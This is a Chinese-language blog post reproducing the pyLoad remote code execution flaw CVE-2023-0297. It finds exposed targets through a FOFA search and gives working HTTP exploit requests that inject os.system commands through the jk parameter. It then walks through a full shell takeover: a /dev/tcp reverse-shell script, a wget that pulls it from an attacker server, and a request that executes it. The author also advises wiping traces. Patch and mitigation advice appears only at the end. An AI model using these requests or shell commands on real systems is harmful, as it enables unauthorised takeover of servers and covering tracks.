pyLoad远程代码执行漏洞复现(CVE-2023-0297)

1、产品简介

pyLoad是一个用 Python 编写的免费和开源下载管理器,可用于NAS、下一代路由器、无头家庭服务器以及任何能够连接到互联网并支持 Python 编程语言的设备。

2、漏洞概述

pyLoad 存在代码注入漏洞,未经身份验证的攻击者可以通过滥用 js2py 功能执行任意 Python 代码

3、影响范围

影响版本:

pyLoad <= 0.4.20

另外,小于0.5.0b3.dev31版本的pyLoad开发版本也受此漏洞影响。

不受影响版本:

pyLoad > 0.4.20(正式版本尚未发布)

另外,官方已更新pyLoad安全开发版本0.5.0b3.dev31可供下载。

4、复现环境

 FOFA搜索关键字"pyLoad"

pyLoad远程代码执行漏洞复现(CVE-2023-0297)_第1张图片

 5、漏洞复现

访问首页bp抓包,发送Repeater模块

pyLoad远程代码执行漏洞复现(CVE-2023-0297)_第2张图片

pyLoad远程代码执行漏洞复现(CVE-2023-0297)_第3张图片

POC如下:

POST /flash/addcrypted2 HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
 
jk=pyimport%20os;os.system("执行的命令");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa

 dnslog平台判断漏洞是否存在

pyLoad远程代码执行漏洞复现(CVE-2023-0297)_第4张图片

成功请求dnslog平台了,漏洞存在

6、漏洞利用

这里准备直接反弹shell,尝试了几遍各种方法,都无效(知道的大佬指点一下)

换个思路getshell,既然目标出网,那让他去下载恶意脚本来获取shell

准备payload

vi 1.sh
 
!/bin/sh
bash -c 'exec bash -i >& /dev/tcp/x.x.x.x/6666 0>&1'

利用python来搭建http服务器

python3 -m http.server 8000   #空闲端口且开放访问策略

exp:

POST /flash/addcrypted2 HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
 
jk=pyimport%20os;os.system("wget%20http://x.x.x.x:8000/1.sh%20-O%20/tmp/shell.sh");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa

pyLoad远程代码执行漏洞复现(CVE-2023-0297)_第5张图片 

 可以看到已经下载了恶意脚本

vps开启监听,执行恶意脚本

POST /flash/addcrypted2 HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
 
jk=pyimport%20os;os.system("/bin/bash%20/tmp/shell.sh");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa

pyLoad远程代码执行漏洞复现(CVE-2023-0297)_第6张图片

成功反弹shell(测试完记得把脚本和记录删了,别留痕)

pyLoad远程代码执行漏洞复现(CVE-2023-0297)_第7张图片 

 7、修复建议

1.版本升级

目前该漏洞已经在最新开发版本中修复,受影响用户可通过下载github发布的master分支构建程序:

https://github.com/pyLoad/pyLoad

也可通过PyPI直接安装最新版本:

pip install --pre pyload-ng

2.缓解措施

1) 在pyLoad中禁用pyimport功能。

在src/pyload/core/utils/misc.py文件中,

import js2py
+js2py.disable_pyimport()

2)在业务允许的前提下,将系统部署在内网,减少外部暴露面。

你可能感兴趣的:(服务器,网络安全,安全,web安全)